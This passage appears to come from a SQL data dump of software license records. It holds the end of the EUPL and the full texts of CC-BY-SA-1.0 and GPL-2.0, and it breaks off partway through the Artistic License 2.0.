and all of its terms and conditions\nby exercising any rights granted to You by Article 2 of this Licence, such\nas the use of the Work, the creation by You of a Derivative Work or the Distribution\nand/or Communication by You of the Work or copies thereof.\n\n 11. Information to the public\n\nIn case of any Distribution and/or Communication of the Work by means of electronic\ncommunication by You (for example, by offering to download the Work from a\nremote location) the distribution channel or media (for example, a website)\nmust at least provide to the public the information requested by the applicable\nlaw regarding the Licensor, the Licence and the way it may be accessible,\nconcluded, stored and reproduced by the Licensee.\n\n 12. Termination of the Licence\n\nThe Licence and the rights granted hereunder will terminate automatically\nupon any breach by the Licensee of the terms of the Licence. Such a termination\nwill not terminate the licences of any person who has received the Work from\nthe Licensee under the Licence, provided such persons remain in full compliance\nwith the Licence.\n\n 13. Miscellaneous\n\nWithout prejudice of Article 9 above, the Licence represents the complete\nagreement between the Parties as to the Work licensed hereunder.\n\nIf any provision of the Licence is invalid or unenforceable under applicable\nlaw, this will not affect the validity or enforceability of the Licence as\na whole. Such provision will be construed and/or reformed so as necessary\nto make it valid and enforceable.\n\nThe European Commission may publish other linguistic versions and/or new versions\nof this Licence, so far this is required and reasonable, without reducing\nthe scope of the rights granted by the Licence. New versions of the Licence\nwill be published with a unique version number.\n\nAll linguistic versions of this Licence, approved by the European Commission,\nhave identical value. Parties can take advantage of the linguistic version\nof their choice.\n\n 14. Jurisdiction\n\nAny litigation resulting from the interpretation of this License, arising\nbetween the European Commission, as a Licensor, and any Licensee, will be\nsubject to the jurisdiction of the Court of Justice of the European Communities,\nas laid down in article 238 of the Treaty establishing the European Community.\n\nAny litigation arising between Parties, other than the European Commission,\nand resulting from the interpretation of this License, will be subject to\nthe exclusive jurisdiction of the competent court where the Licensor resides\nor conducts its primary business.\n\n 15. Applicable Law\n\nThis Licence shall be governed by the law of the European Union country where\nthe Licensor resides or has his registered office.\n\n This licence shall be governed by the Belgian law if:\n\n- a litigation arises between the European Commission, as a Licensor, and\nany Licensee;\n\n- the Licensor, other than the European Commission, has no residence or registered\noffice inside a European Union country.\n\nAppendix\n\n\"Compatible Licences\" according to article 5 EUPL are:\n\n - GNU General Public License (GNU GPL) v. 2\n\n - Open Software License (OSL) v. 2.1, v. 3.0\n\n - Common Public License v. 1.0\n\n - Eclipse Public License v. 1.0\n\n - Cecill v. 2.0\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(322,'CC-BY-SA-1.0','Creative Commons Attribution-ShareAlike 1.0 CREATIVE COMMONS CORPORATION IS\nNOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS DRAFT\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may distribute, publicly display, publicly perform, or publicly digitally\nperform a Derivative Work only under the terms of this License, and You must\ninclude a copy of, or the Uniform Resource Identifier for, this License with\nevery copy or phonorecord of each Derivative Work You distribute, publicly\ndisplay, publicly perform, or publicly digitally perform. You may not offer\nor impose any terms on the Derivative Works that alter or restrict the terms\nof this License or the recipients\' exercise of the rights granted hereunder,\nand You must keep intact all notices that refer to this License and to the\ndisclaimer of warranties. You may not distribute, publicly display, publicly\nperform, or publicly digitally perform the Derivative Work with any technological\nmeasures that control access or use of the Work in a manner inconsistent with\nthe terms of this License Agreement. The above applies to the Derivative Work\nas incorporated in a Collective Work, but this does not require the Collective\nWork apart from the Derivative Work itself to be made subject to the terms\nof this License.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\na. By offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\n\ni. Licensor has secured all rights in the Work necessary to grant the license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments;\n\nii. The Work does not infringe the copyright, trademark, publicity rights,\ncommon law rights or any other right of any third party or constitute defamation,\ninvasion of privacy or other tortious injury to any third party.\n\nb. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE AGREED IN WRITING\nOR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE WORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(323,'GPL-2.0-only','GNU GENERAL PUBLIC LICENSE\n\nVersion 2, June 1991\n\nCopyright (C) 1989, 1991 Free Software Foundation, Inc. \n\n51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 , USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public License is intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users. This General Public License applies to\nmost of the Free Software Foundation\'s software and to any other program whose\nauthors commit to using it. (Some other Free Software Foundation software\nis covered by the GNU Lesser General Public License instead.) You can apply\nit to your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish), that you receive source code or can get it if you want it, that you\ncan change the software or use pieces of it in new free programs; and that\nyou know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe software, or if you modify it.\n\nFor example, if you distribute copies of such a program, whether gratis or\nfor a fee, you must give the recipients all the rights that you have. You\nmust make sure that they, too, receive or can get the source code. And you\nmust show them these terms so they know their rights.\n\nWe protect your rights with two steps: (1) copyright the software, and (2)\noffer you this license which gives you legal permission to copy, distribute\nand/or modify the software.\n\nAlso, for each author\'s protection and ours, we want to make certain that\neveryone understands that there is no warranty for this free software. If\nthe software is modified by someone else and passed on, we want its recipients\nto know that what they have is not the original, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nFinally, any free program is threatened constantly by software patents. We\nwish to avoid the danger that redistributors of a free program will individually\nobtain patent licenses, in effect making the program proprietary. To prevent\nthis, we have made it clear that any patent must be licensed for everyone\'s\nfree use or not licensed at all.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License applies to any program or other work which contains a notice\nplaced by the copyright holder saying it may be distributed under the terms\nof this General Public License. The \"Program\", below, refers to any such program\nor work, and a \"work based on the Program\" means either the Program or any\nderivative work under copyright law: that is to say, a work containing the\nProgram or a portion of it, either verbatim or with modifications and/or translated\ninto another language. (Hereinafter, translation is included without limitation\nin the term \"modification\".) Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running the Program\nis not restricted, and the output from the Program is covered only if its\ncontents constitute a work based on the Program (independent of having been\nmade by running the Program). Whether that is true depends on what the Program\ndoes.\n\n1. You may copy and distribute verbatim copies of the Program\'s source code\nas you receive it, in any medium, provided that you conspicuously and appropriately\npublish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this License and to the absence\nof any warranty; and give any other recipients of the Program a copy of this\nLicense along with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Program or any portion of it,\nthus forming a work based on the Program, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\na) You must cause the modified files to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nb) You must cause any work that you distribute or publish, that in whole or\nin part contains or is derived from the Program or any part thereof, to be\nlicensed as a whole at no charge to all third parties under the terms of this\nLicense.\n\nc) If the modified program normally reads commands interactively when run,\nyou must cause it, when started running for such interactive use in the most\nordinary way, to print or display an announcement including an appropriate\ncopyright notice and a notice that there is no warranty (or else, saying that\nyou provide a warranty) and that users may redistribute the program under\nthese conditions, and telling the user how to view a copy of this License.\n(Exception: if the Program itself is interactive but does not normally print\nsuch an announcement, your work based on the Program is not required to print\nan announcement.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Program, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Program, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Program.\n\nIn addition, mere aggregation of another work not based on the Program with\nthe Program (or with a work based on the Program) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may copy and distribute the Program (or a work based on it, under Section\n2) in object code or executable form under the terms of Sections 1 and 2 above\nprovided that you also do one of the following:\n\na) Accompany it with the complete corresponding machine-readable source code,\nwhich must be distributed under the terms of Sections 1 and 2 above on a medium\ncustomarily used for software interchange; or,\n\nb) Accompany it with a written offer, valid for at least three years, to give\nany third party, for a charge no more than your cost of physically performing\nsource distribution, a complete machine-readable copy of the corresponding\nsource code, to be distributed under the terms of Sections 1 and 2 above on\na medium customarily used for software interchange; or,\n\nc) Accompany it with the information you received as to the offer to distribute\ncorresponding source code. (This alternative is allowed only for noncommercial\ndistribution and only if you received the program in object code or executable\nform with such an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for making\nmodifications to it. For an executable work, complete source code means all\nthe source code for all modules it contains, plus any associated interface\ndefinition files, plus the scripts used to control compilation and installation\nof the executable. However, as a special exception, the source code distributed\nneed not include anything that is normally distributed (in either source or\nbinary form) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component itself\naccompanies the executable.\n\nIf distribution of executable or object code is made by offering access to\ncopy from a designated place, then offering equivalent access to copy the\nsource code from the same place counts as distribution of the source code,\neven though third parties are not compelled to copy the source along with\nthe object code.\n\n4. You may not copy, modify, sublicense, or distribute the Program except\nas expressly provided under this License. Any attempt otherwise to copy, modify,\nsublicense or distribute the Program is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n5. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nProgram or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Program\n(or any work based on the Program), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n6. Each time you redistribute the Program (or any work based on the Program),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute or modify the Program subject to these terms and conditions.\nYou may not impose any further restrictions on the recipients\' exercise of\nthe rights granted herein. You are not responsible for enforcing compliance\nby third parties to this License.\n\n7. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Program at all. For example, if a\npatent license would not permit royalty-free redistribution of the Program\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply and\nthe section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system, which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n8. If the distribution and/or use of the Program is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Program under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n9. The Free Software Foundation may publish revised and/or new versions of\nthe General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nProgram does not specify a version number of this License, you may choose\nany version ever published by the Free Software Foundation.\n\n10. If you wish to incorporate parts of the Program into other free programs\nwhose distribution conditions are different, write to the author to ask for\npermission. For software which is copyrighted by the Free Software Foundation,\nwrite to the Free Software Foundation; we sometimes make exceptions for this.\nOur decision will be guided by the two goals of preserving the free status\nof all derivatives of our free software and of promoting the sharing and reuse\nof software generally.\n\n NO WARRANTY\n\n11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively convey the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n< one line to give the program\'s name and an idea of what it does. >\n\nCopyright (C) < yyyy > < name of author >\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 2 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program; if not, write to the Free Software Foundation, Inc., 51 Franklin\nStreet, Fifth Floor, Boston, MA 02110-1301 , USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this when\nit starts in an interactive mode:\n\nGnomovision version 69, Copyright (C) year name of author Gnomovision comes\nwith ABSOLUTELY NO WARRANTY; for details type `show w\'. This is free software,\nand you are welcome to redistribute it under certain conditions; type `show\nc\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, the commands you use may be\ncalled something other than `show w\' and `show c\'; they could even be mouse-clicks\nor menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision\'\n(which makes passes at compilers) written by James Hacker.\n\n< signature of Ty Coon > , 1 April 1989 Ty Coon, President of Vice This General\nPublic License does not permit incorporating your program into proprietary\nprograms. If your program is a subroutine library, you may consider it more\nuseful to permit linking proprietary applications with the library. If this\nis what you want to do, use the GNU Lesser General Public License instead\nof this License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(324,'Artistic-2.0','The Artistic License 2.0\n\nCopyright (c) 2000-2006, The Perl Foundation.\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThis license establishes the terms under which a given free software Package\nmay be copied, modified, distributed, and/or redistributed. The intent is\nthat the Copyright Holder maintains some artistic control over the development\nof that Package while still keeping the Package available as open source and\nfree software.\n\nYou are always permitted to make arrangements wholly outside of this license\ndirectly with the Copyright Holder of a given Package. If the terms of this\nlicense do not permit the full use that you propose to make of the Package,\nyou should contact the Copyright Holder and seek a different licensing arrangement.\n\nDefinitions\n\n \n\n\"Copyright Holder\" means the individual(s) or organization(s) named in the\ncopyright notice for the entire Package.\n\n \n\n\"Contributor\" means any party that has contributed code or other material\nto the Package, in accordance with the Copyright Holder\'s procedures.\n\n \n\n\"You\" and \"your\" means any person who would like to copy, distribute, or modify\nthe Package.\n\n \n\n\"Package\" means the collection of files distributed by the Copyright Holder,\nand derivatives of that collection and/or of those files. A given Package\nmay consist of either the Standard Version, or a Modified Version.\n\n \n\n\"Distribute\" means providing a copy of the Package or making it accessible\nto anyone else, or in the case of a company or organization, to others outside\nof your company or organization.\n\n \n\n\"Distributor Fee\" means any fee that you charge for Distributing this Package\nor providing support for this Package to another party. It does not mean licensing\nfees.\n\n \n\n\"Standard Version\" refers to the Package if it has not been modified, or has\nbeen modified only in ways explicitly requested by the Copyright Holder.\n\n \n\n\"Modified Version\" means the Package, if it has been changed, and such changes\nwere not explicitly requested by the Copyright Holder.\n\n \n\n\"Original License\" means this Artistic License as Distributed with the Standard\nVersion of the Package, in its current version or as it may be modified by\nThe Perl Foundation in the future.\n\n \n\n\"Source\" form means the source code, documentation source, and configuration\nfiles for the Package.\n\n \n\n\"Compiled\" form means the compiled bytecode, object code, binary, or any other\nform resulting from mechanical transformation or translation of the Source\nform.\n\nPermission for Use and Modification Without Distribution\n\n(1) You are permitted to use the Standard Version and create and use Modified\nVersions for any purpose without restriction, provided that you do not Distribute\nthe Modified Version.\n\nPermissions for Redistribution of the Standard Version\n\n(2) You may Distribute verbatim copies of the Source form of the Standard\nVersion of this Package in any medium without restriction, either gratis or\nfor a Distributor Fee, provided that you duplicate all of the original copyright\nnotices and associated disclaimers. At your discretion, such verbatim copies\nmay or may not include a Compiled form of the Package.\n\n(3) You may apply any bug fixes, portability changes, and other modifications\nmade available from the Copyright Holder. The resulting Package will still\nbe considered the Standard Version, and as such will be subject to the Original\nLicense.\n\nDistribution of Modified Versions of the Package as Source\n\n(4) You may Distribute your Modified Version as Source (either gratis or for\na Distributor Fee, and with or without a Compiled form of the Modified Version)\nprovided that you clearly document how it differs from the Standard Version,\nincluding, but not limited to, documenting any non-standard features, executables,\nor modules, and provided that you do at least ONE of the following:\n\n(a) make the Modified Version available to the Copyright Holder of the Standard\nVersion, under the Original License, so that the Copyright Holder may include\nyour modifications in the Standard Version.\n\n(b) ensure that installation of your Modified Version does not prevent the\nuser installing or running the Standard Version. In addition, the Modified\nVersion must bear a name that is different from the name of the Standard Version.\n\n(c) allow anyone who receives a copy of the Modified Version to make the Source\nform of the Modified Version available to others under\n\n (i) the Original License or\n\n(ii) a license that permits the licensee to freely copy, modify and redistribute\nthe Modified Version using the same licensing terms that apply to the copy\nthat the licensee received, and requires that the Source form of the Modified\nVersion, and of any works derived from it, be made freely available in that\nlicense fees are prohibited but Distributor Fees are allowed.\n\nDistribution of Compiled Forms of the Standard Version or Modified Versions\nwithout the Source\n\n(5) You may Distribute Compiled forms of the Standard Version without the\nSource, provided that you include complete instructions on how to get the\nSource of the Standard Version. Such instructions must be valid at the time\nof your distribution. If these instructions, at any time while you are carrying\nout such distribution, become invalid, you must provide new instructions on\ndemand or cease further distribution. If you provide valid instructions or\ncease distribution within thirty days after you become aware that the instructions\nare invalid, then you do not forfeit any of your rights under this license.\n\n(6) You may Distribute a Modified Version in Compiled form without the Source,\nprovided that you comply with Section 4 with respect to the Source of the\nModified Version.\n\nAggregating or Linking the Package\n\n(7) You may aggregate the Package (either the Standard Version or Modified\nVersion) with other packages and Distribute the resulting aggregation provided\nthat you do not charge a licensing fee for the Package. Distributor Fees are\npermitted, and licensing fees for other components in the aggregation are\npermitted. The terms of this license apply to the use and Distribution of\nthe Standard or Modified Versions as included in the aggregation.\n\n(8) You are permitted to link Modified and Standard Versions with other works,\nto embed the Package in a larger work of your own, or to build stand-alone\nbinary or bytecode versions of applications that include the Package, and\nDistribute the result without restriction, provided the result does not expose\na direct interface to the Package.\n\nItems That are Not Considered Part of a Modified Version\n\n(9) Works (including, but not limited to, modules and scripts) that merely\nextend or make use of the Package, do not, by themselves, cause the Package\nto be a Modified Version. In addition, such works are not considered parts\nof the Package itself, and are not subject to the terms of this license.\n\nGeneral Provisions\n\n(10) Any use, modification, and distribution of the Standard or Modified Versions\nis governed by this Artistic License. By using, modifying or distributing\nthe Package, you accept this license. Do not use, modify, or distribute the\nPackage, if you do not accept this license.\n\n(11) If your Modified Version has been derived from a Modified Version made\nby someone other than you, you are nevertheless required to ensure that your\nModified Version complies with the requirements of this license.\n\n(12) This license does not grant you the right to use any trademark, service\nmark, tradename, or logo of the Copyright Holder.\n\n(13) This license includes the non-exclusive, worldwide, free-of-charge patent\nlicense to make, have made, use, offer to sell, sell, import and otherwise\ntransfer the Package with respect to any patent claims licensable by the Copyright\nHolder that are necessarily infringed by the Package. If you institute patent\nlitigation (including a cross-claim or counterclaim) against any party 